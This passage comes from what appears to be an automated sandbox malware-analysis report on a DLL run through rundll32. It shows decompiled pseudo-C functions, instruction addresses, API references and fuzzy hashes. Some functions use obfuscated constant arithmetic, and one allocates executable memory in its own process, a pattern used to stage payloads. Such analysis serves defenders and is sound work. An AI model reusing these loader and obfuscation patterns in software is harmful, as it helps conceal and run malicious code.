				_v8 = _v8 ^ 0x918d7bef;
				_v28 = 0x8ae6;
				_v28 = _v28 + 0xffff2048;
				_v28 = _v28 ^ 0xfffff0f4;
				_v40 = 0x90b0;
				_v40 = _v40 + 0x186c;
				_v40 = _v40 ^ 0x0000e60c;
				_v12 = 0x4bc7;
				_t103 = __edx;
				_v12 = _v12 * 0x77;
				_v12 = _v12 >> 8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x000165a0;
				_v36 = 0x87ea;
				_v36 = _v36 | 0x75974cd4;
				_v36 = _v36 ^ 0x75979443;
				_v32 = 0x7f4c;
				_v32 = _v32 ^ 0x8971dc13;
				_v32 = _v32 ^ 0x89718547;
				_v24 = 0xd36b;
				_t104 = 0x3c;
				_v24 = _v24 * 9;
				_v24 = _v24 << 1;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x000045e9;
				_v20 = 0xf34d;
				_v20 = _v20 + 0x5309;
				_v20 = _v20 << 0xa;
				_v20 = _v20 | 0x23e3e3ea;
				_v20 = _v20 ^ 0x27fbee67;
				_v16 = 0xef72;
				_v16 = _v16 * 0x55;
				_v16 = _v16 << 0x10;
				_v16 = _v16 / _t104;
				_v16 = _v16 ^ 0x0225d37d;
				_push(_v28);
				_t91 = E00B21000(_v40, _v12, _v36, _v32, E00B3889D(_t93, _v8, _v16));
				_t95 =  *0xb3ca28; // 0x4f2d00
				 *((intOrPtr*)(_t95 + 0x1c + _t103 * 4)) = _t91;
				return E00B32025(_v24, _t90, _v20, _v16);
			}

0x00b2b425
0x00b2b429
0x00b2b430
0x00b2b437
0x00b2b43b
0x00b2b43f
0x00b2b446
0x00b2b44d
0x00b2b454
0x00b2b45b
0x00b2b462
0x00b2b469
0x00b2b470
0x00b2b477
0x00b2b484
0x00b2b48a
0x00b2b48d
0x00b2b491
0x00b2b495
0x00b2b49c
0x00b2b4a3
0x00b2b4aa
0x00b2b4b1
0x00b2b4b8
0x00b2b4bf
0x00b2b4c6
0x00b2b4d1
0x00b2b4d2
0x00b2b4d5
0x00b2b4d8
0x00b2b4dc
0x00b2b4e3
0x00b2b4ea
0x00b2b4f1
0x00b2b4f5
0x00b2b4fc
0x00b2b503
0x00b2b50e
0x00b2b511
0x00b2b51a
0x00b2b51d
0x00b2b524
0x00b2b53e
0x00b2b543
0x00b2b551
0x00b2b565

Strings

#, xrefs: 00B2B4F5

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: #
API String ID: 1029625771-3128688783
Opcode ID: 86b01be41dd10c348b2a08a599b159aaf0f206c9b96dae86a68e11b41a6a9d43
Instruction ID: 4ebc3231722dd17945b3bd79b2e5822ba4334250a3fe6754a184a843bb4b5879
Opcode Fuzzy Hash: 86b01be41dd10c348b2a08a599b159aaf0f206c9b96dae86a68e11b41a6a9d43
Instruction Fuzzy Hash: 3B41ED72C0031AEBDB08CFA5C94A4EEBBB1FB54318F208599D411B62A4D7B90B48CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B28736, Relevance: .1, Instructions: 56
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00B28736(long __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				long _t77;

				_v16 = 0x5e27;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xcb06;
				_v16 = _v16 + 0xffffffa0;
				_v16 = _v16 ^ 0x0000caae;
				_v20 = 0x53d5;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x29eaafbc;
				_v12 = 0x2701;
				_t77 = __ecx;
				_t66 = 0x3f;
				_v12 = _v12 * 0x75;
				_v12 = _v12 / _t66;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x0000510c;
				_v24 = 0xb555;
				_v24 = _v24 | 0xad821aca;
				_v24 = _v24 ^ 0xad82f196;
				_v8 = 0x411b;
				_t67 = 0x67;
				_v8 = _v8 / _t67;
				_t68 = 0x1c;
				_v8 = _v8 / _t68;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00005eaa;
				_t64 = E00B3981E(_t77, E00B2C506(_t68), _v16, _v12, _v24, _v8); // executed
				return _t64;
			}

0x00b2873c
0x00b28745
0x00b28749
0x00b28750
0x00b28754
0x00b2875b
0x00b28762
0x00b28766
0x00b2876d
0x00b2877b
0x00b2877d
0x00b2877e
0x00b28788
0x00b2878d
0x00b28791
0x00b28798
0x00b2879f
0x00b287a6
0x00b287ad
0x00b287b7
0x00b287bc
0x00b287c4
0x00b287c7
0x00b287ca
0x00b287ce
0x00b287ed
0x00b287f9

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
Instruction ID: a72a217ed59cf8001b695ff0031c49acabbeada6533185c1832709af2fffd3e6
Opcode Fuzzy Hash: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
Instruction Fuzzy Hash: EF212271D00209EBEB08DFA9D94A4DEBBB2EB44304F208199E415B7294E7B51B64DF81

Uniqueness

Uniqueness Score: -1.00%

Function 10003A92, Relevance: 12.1, APIs: 8, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E10003A92(void* __edx) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t57;
				void* _t60;
				void* _t67;
				signed int _t70;
				void* _t73;
				signed int _t74;
				signed int _t78;
				void* _t80;

				_t67 = __edx;
				_push(0x10);
				_push(0x1004af08);
				E100040F0();
				_t34 =  *0x1004dc68; // 0x0
				if(_t34 > 0) {
					 *0x1004dc68 = _t34 - 1;
					 *(_t80 - 0x1c) = 1;
					 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
					 *((char*)(_t80 - 0x20)) = E100034F1();
					 *(_t80 - 4) = 1;
					__eflags =  *0x1004dc44 - 2;
					if( *0x1004dc44 != 2) {
						E10003EE0(_t67, 1, _t73, 7);
						asm("int3");
						_push(0xc);
						_push(0x1004af30);
						E100040F0();
						_t70 =  *(_t80 + 0xc);
						__eflags = _t70;
						if(_t70 != 0) {
							L9:
							 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
							__eflags = _t70 - 1;
							if(_t70 == 1) {
								L12:
								_t57 =  *(_t80 + 0x10);
								_t74 = E10003C4D( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
								 *(_t80 - 0x1c) = _t74;
								__eflags = _t74;
								if(_t74 != 0) {
									_t41 = E10003938(_t60,  *((intOrPtr*)(_t80 + 8)), _t70, _t57); // executed
									_t74 = _t41;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t74;
									if(_t74 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t70 - 2;
								if(_t70 == 2) {
									goto L12;
								} else {
									_t57 =  *(_t80 + 0x10);
									L14:
									_push(_t57);
									_push(_t70);
									_push( *((intOrPtr*)(_t80 + 8)));
									_t42 = E10004518();
									_t74 = _t42;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t70 - 1;
									if(_t70 == 1) {
										__eflags = _t74;
										if(_t74 == 0) {
											_push(_t57);
											_push(_t42);
											_push( *((intOrPtr*)(_t80 + 8)));
											_t45 = E10004518();
											__eflags = _t57;
											_t25 = _t57 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E10003A92(_t67);
											_pop(_t60);
											E10003C4D( *((intOrPtr*)(_t80 + 8)), _t74, _t57);
										}
									}
									__eflags = _t70;
									if(_t70 == 0) {
										L19:
										_t74 = E10003938(_t60,  *((intOrPtr*)(_t80 + 8)), _t70, _t57);
										 *(_t80 - 0x1c) = _t74;
										__eflags = _t74;
										if(_t74 != 0) {
											_t74 = E10003C4D( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
											 *(_t80 - 0x1c) = _t74;
										}
									} else {
										__eflags = _t70 - 3;
										if(_t70 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t80 - 4) = 0xfffffffe;
							_t40 = _t74;
						} else {
							__eflags =  *0x1004dc68 - _t70; // 0x0
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
						return _t40;
					} else {
						E100035BC(_t60);
						E1000452A();
						E10004591();
						 *0x1004dc44 =  *0x1004dc44 & 0x00000000;
						 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
						E10003B27();
						_t54 = E1000375D( *((intOrPtr*)(_t80 + 8)), 0);
						asm("sbb esi, esi");
						_t78 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t78;
						 *(_t80 - 0x1c) = _t78;
						 *(_t80 - 4) = 0xfffffffe;
						E10003B34();
						_t56 = _t78;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
					return _t56;
				}
			}

0x10003a92
0x10003a92
0x10003a94
0x10003a99
0x10003a9e
0x10003aa5
0x10003aac
0x10003ab4
0x10003ab7
0x10003ac0
0x10003ac3
0x10003ac6
0x10003acd
0x10003b3c
0x10003b41
0x10003b42
0x10003b44
0x10003b49
0x10003b4e
0x10003b51
0x10003b53
0x10003b64
0x10003b64
0x10003b68
0x10003b6b
0x10003b77
0x10003b77
0x10003b84
0x10003b86
0x10003b89
0x10003b8b
0x10003b96
0x10003b9b
0x10003b9d
0x10003ba0
0x10003ba2
0x00000000
0x00000000
0x10003ba2
0x10003b6d
0x10003b6d
0x10003b70
0x00000000
0x10003b72
0x10003b72
0x10003ba8
0x10003ba8
0x10003ba9
0x10003baa
0x10003bad
0x10003bb2
0x10003bb4
0x10003bb7
0x10003bba
0x10003bbc
0x10003bbe
0x10003bc0
0x10003bc1
0x10003bc2
0x10003bc5
0x10003bca
0x10003bcc
0x10003bcc
0x10003bd2
0x10003bd3
0x10003bd8
0x10003bde
0x10003bde
0x10003bbe
0x10003be3
0x10003be5
0x10003bec
0x10003bf6
0x10003bf8
0x10003bfb
0x10003bfd
0x10003c09
0x10003c31
0x10003c31
0x10003be7
0x10003be7
0x10003bea
0x00000000
0x00000000
0x10003bea
0x10003be5
0x10003b70
0x10003c34
0x10003c3b
0x10003b55
0x10003b55
0x10003b5b
0x00000000
0x10003b5d
0x10003b5d
0x10003b5d
0x10003b5b
0x10003c40
0x10003c4c
0x10003acf
0x10003acf
0x10003ad4
0x10003ad9
0x10003ade
0x10003ae5
0x10003ae9
0x10003af3
0x10003aff
0x10003b01
0x10003b01
0x10003b03
0x10003b06
0x10003b0d
0x10003b12
0x00000000
0x10003b12
0x10003aa7
0x10003aa7
0x10003b14
0x10003b17
0x10003b23
0x10003b23

APIs

__RTC_Initialize.LIBCMT ref: 10003AD9
___scrt_uninitialize_crt.LIBCMT ref: 10003AF3

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 7a051707ff0741b05a1ee3ce02520a6e0ff3268bbec48c4d0bc0eb2efb0be8cb
Instruction ID: 7bfdc372d2ca72936bd1731edce63cf54240d63550fca9bbaf8a272257527a9e
Opcode Fuzzy Hash: 7a051707ff0741b05a1ee3ce02520a6e0ff3268bbec48c4d0bc0eb2efb0be8cb
Instruction Fuzzy Hash: 8C41C272D04669ABFB22DF59CC41BAF7BACEB816D5F11C11AF804A715AC7705E01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10029C50, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10029C50(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t13;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x1004e548 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x10045368 + _t22 * 4);
						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
						_t32 = _t13;
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E10023828(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E10023828(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x10029c59
0x10029d03
0x10029c61
0x10029c63
0x10029c6a
0x10029c6c
0x10029c72
0x10029c7f
0x10029c8e
0x10029c94
0x10029c98
0x10029cea
0x10029cea
0x10029cef
0x10029cf3
0x10029cf6
0x10029cf6
0x10029cfc
0x10029cfe
0x10029d13
0x10029d0e
0x10029d12
0x10029d12
0x10029d00
0x10029d00
0x00000000
0x10029d00
0x10029c9a
0x10029ca3
0x10029cda
0x10029cda
0x10029cdc
0x10029cde
0x00000000
0x00000000
0x10029ce6
0x00000000
0x10029ce6
0x10029cad
0x10029cb2
0x10029cb7
0x00000000
0x00000000
0x10029cc1
0x10029cc6
0x10029ccb
0x00000000
0x00000000
0x10029cd0
0x10029cd6
0x00000000
0x10029cd6
0x10029c77
0x00000000
0x00000000
0x00000000
0x10029c7d
0x10029d0c
0x00000000

Strings

ext-ms-, xrefs: 10029CBB
api-ms-, xrefs: 10029CA7

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 00ca16b444452de063b7c347b4828efdadee3ad1140b3dd23fdb962c2a8c0164
Instruction ID: 9a454b55204e61d5b080d74c5da724d9454356f1e041ce2ebe6f9b52f1a9641a
Opcode Fuzzy Hash: 00ca16b444452de063b7c347b4828efdadee3ad1140b3dd23fdb962c2a8c0164
Instruction Fuzzy Hash: 44218471A05261BBDB21CB64ED84A4E77D8EF427E1FB20121ED46E7291E770ED00D6E4

Uniqueness

Uniqueness Score: -1.00%

Function 1000D67D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000D67D(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x1004e034 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x100438d8 + _t11 * 4);
						_v8 = _t12;
						_t13 = LoadLibraryExW(_t12, 0, 0x800); // executed
						_t29 = _t13;
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E10023828(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x1000d684
0x1000d6f8
0x1000d689
0x1000d68b
0x1000d692
0x1000d696
0x1000d69f
0x1000d6ae
0x1000d6b1
0x1000d6b7
0x1000d6bb
0x1000d704
0x1000d706
0x1000d70a
0x1000d70d
0x1000d70d
0x1000d713
0x1000d713
0x1000d6ff
0x1000d703
0x1000d703
0x1000d6bd
0x1000d6c6
0x1000d6f0
0x1000d6f3
0x1000d6f5
0x1000d6f5
0x00000000
0x1000d6f5
0x1000d6c8
0x1000d6d3
0x1000d6d8
0x1000d6dd
0x00000000
0x00000000
0x1000d6e4
0x1000d6ea
0x1000d6ee
0x00000000
0x00000000
0x00000000
0x1000d6ee
0x1000d69b
0x00000000
0x00000000
0x00000000
0x1000d69d
0x1000d6fd
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,1000D73E,00000000,?,00000001,00000000,?,1000D871,00000001,FlsFree,10043994,FlsFree,00000000), ref: 1000D70D

Strings

api-ms-, xrefs: 1000D6CD

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: bda9a083905e9972f6869984c368c17e2cf1144b0b7e5e1f4797190f804308a2
Instruction ID: 65af02aee665ade10d00ef86524baa454b466fb1c62f40754c56af64b2f9aaab
Opcode Fuzzy Hash: bda9a083905e9972f6869984c368c17e2cf1144b0b7e5e1f4797190f804308a2
Instruction Fuzzy Hash: 0C119431A01666ABEB21EB689C8474D37D4DF027E0F120122EA18EB284E661ED0086E5

Uniqueness

Uniqueness Score: -1.00%

Function 10003B42, Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E10003B42(void* __edx) {
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t34;
				void* _t36;
				void* _t39;
				intOrPtr _t40;
				intOrPtr _t42;
				void* _t44;
				void* _t48;

				_t39 = __edx;
				_push(0xc);
				_push(0x1004af30);
				E100040F0();
				_t40 =  *((intOrPtr*)(_t44 + 0xc));
				if(_t40 != 0) {
					L3:
					 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
					if(_t40 == 1 || _t40 == 2) {
						_t34 =  *((intOrPtr*)(_t44 + 0x10));
						_t42 = E10003C4D( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
						 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
						if(_t42 != 0) {
							_t25 = E10003938(_t36,  *((intOrPtr*)(_t44 + 8)), _t40, _t34); // executed
							_t42 = _t25;
							 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
							if(_t42 != 0) {
								goto L8;
							}
						}
					} else {
						_t34 =  *((intOrPtr*)(_t44 + 0x10));
						L8:
						_push(_t34);
						_push(_t40);
						_push( *((intOrPtr*)(_t44 + 8)));
						_t26 = E10004518();
						_t42 = _t26;
						 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
						if(_t40 == 1 && _t42 == 0) {
							_push(_t34);
							_push(_t26);
							_push( *((intOrPtr*)(_t44 + 8)));
							_push((E10004518() & 0xffffff00 | _t34 != 0x00000000) & 0x000000ff);
							E10003A92(_t39);
							_pop(_t36);
							E10003C4D( *((intOrPtr*)(_t44 + 8)), _t42, _t34);
						}
						if(_t40 == 0 || _t40 == 3) {
							_t42 = E10003938(_t36,  *((intOrPtr*)(_t44 + 8)), _t40, _t34);
							 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
							if(_t42 != 0) {
								_t42 = E10003C4D( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
								 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
							}
						}
					}
					 *(_t44 - 4) = 0xfffffffe;
					_t24 = _t42;
				} else {
					_t48 =  *0x1004dc68 - _t40; // 0x0
					if(_t48 > 0) {
						goto L3;
					} else {
						_t24 = 0;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0x10));
				return _t24;
			}

0x10003b42
0x10003b42
0x10003b44
0x10003b49
0x10003b4e
0x10003b53
0x10003b64
0x10003b64
0x10003b6b
0x10003b77
0x10003b84
0x10003b86
0x10003b8b
0x10003b96
0x10003b9b
0x10003b9d
0x10003ba2
0x00000000
0x00000000
0x10003ba2
0x10003b72
0x10003b72
0x10003ba8
0x10003ba8
0x10003ba9
0x10003baa
0x10003bad
0x10003bb2
0x10003bb4
0x10003bba
0x10003bc0
0x10003bc1
0x10003bc2
0x10003bd2
0x10003bd3
0x10003bd8
0x10003bde
0x10003bde
0x10003be5
0x10003bf6
0x10003bf8
0x10003bfd
0x10003c09
0x10003c31
0x10003c31
0x10003bfd
0x10003be5
0x10003c34
0x10003c3b
0x10003b55
0x10003b55
0x10003b5b
0x00000000
0x10003b5d
0x10003b5d
0x10003b5d
0x10003b5b
0x10003c40
0x10003c4c

APIs

dllmain_raw.LIBCMT ref: 10003B7F
dllmain_crt_dispatch.LIBCMT ref: 10003B96
dllmain_raw.LIBCMT ref: 10003BDE
dllmain_crt_dispatch.LIBCMT ref: 10003BF1
dllmain_raw.LIBCMT ref: 10003C04

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 81fff7e8ddae1b90393eaad18b17aae06b2df87e031cee5e04bcccc407ad455a
Instruction ID: a8148dc8121538fd3aaffcd9e8ee1bf724536045b9f1c5fcd83538124af9b725
Opcode Fuzzy Hash: 81fff7e8ddae1b90393eaad18b17aae06b2df87e031cee5e04bcccc407ad455a
Instruction Fuzzy Hash: 8F21A171D01659ABFB23DE15CC41E6F7BACEB81AD4B02C125FC05A7219C7319E018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001A7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E10001A7D(intOrPtr _a4, intOrPtr _a8) {
				void* _t4;
				intOrPtr _t8;
				void* _t10;

				_push(0);
				_push(0x40);
				_push(0x3000);
				_push(_a8);
				_push(0);
				_t4 = GetCurrentProcess();
				_push(_t4); // executed
				L10002C92(); // executed
				_t8 =  *0x1004d028; // 0x0
				_t10 = _t4;
				_t9 =  !=  ? 0 : _t8;
				 *0x1004d028 =  !=  ? 0 : _t8;
				E100045C0(_t10, _a4, _a8);
				return _t10;
			}

0x10001a81
0x10001a83
0x10001a85
0x10001a8a
0x10001a8d
0x10001a8f
0x10001a95
0x10001a96
0x10001a9e
0x10001aa4
0x10001aae
0x10001ab1
0x10001ab7
0x10001ac3

APIs

GetCurrentProcess.KERNEL32(00000000,?,00003000,00000040,00000000,LdrFindResource_U,?,10001EF1,LdrFindResource_U,00000000,LdrFindResource_U), ref: 10001A8F
VirtualAllocExNuma.KERNEL32 ref: 10001A96

Strings

LdrFindResource_U, xrefs: 10001A80

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocCurrentNumaProcessVirtual
String ID: LdrFindResource_U
API String ID: 346376999-1041023618
Opcode ID: 4c02bb6aea739f849601bb6fdcb21d7ba60705c9ec75e1d4b7f00a3d6f85dbfa
Instruction ID: d0a16a8f04b34dc33bb485e690be2f78af7230e4dc145071e4a6e5a959ba9fd3
Opcode Fuzzy Hash: 4c02bb6aea739f849601bb6fdcb21d7ba60705c9ec75e1d4b7f00a3d6f85dbfa
Instruction Fuzzy Hash: A2E04879B413247BEB215BA59C45F553F98DB097B1F004021FF0CDA291D571DD5087D8

Uniqueness

Uniqueness Score: -1.00%

Function 100316BB, Relevance: 4.7, APIs: 3, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__freea.LIBCMT ref: 10031871

Part of subcall function 10024214: RtlAllocateHeap.NTDLL(00000000,00000000,70D9FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

__freea.LIBCMT ref: 1003187A
__freea.LIBCMT ref: 1003189D

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __freea$AllocateHeap
String ID:
API String ID: 2243444508-0
Opcode ID: 8d6a3bb3c0f4b8fd41e009e8b6b57536dd7696980958e54c51c196cfdfe389cd
Instruction ID: 7876994cb8969f5935bcb3e1c2cca68d888c4b8f452257783c78087195ffa41b
Opcode Fuzzy Hash: 8d6a3bb3c0f4b8fd41e009e8b6b57536dd7696980958e54c51c196cfdfe389cd
Instruction Fuzzy Hash: 8B51C276600216AFEB12CF64DC41EEB37F9EF49691F264129FD04AB150DB31EC11D6A4

Uniqueness

Uniqueness Score: -1.00%

Function 100023D8, Relevance: 4.6, APIs: 3, Instructions: 89
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,?,00000000,00000000,?,10002A49,00000000,10002159), ref: 10002426
VirtualAlloc.KERNELBASE(10002A49,00000000,00001000,00000004,10002159,00000000,00000000,00000000,?,00000000,00000000,?,10002A49,00000000,10002159), ref: 1000246C
und_memcpy.LIBVCRUNTIME ref: 10002486

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
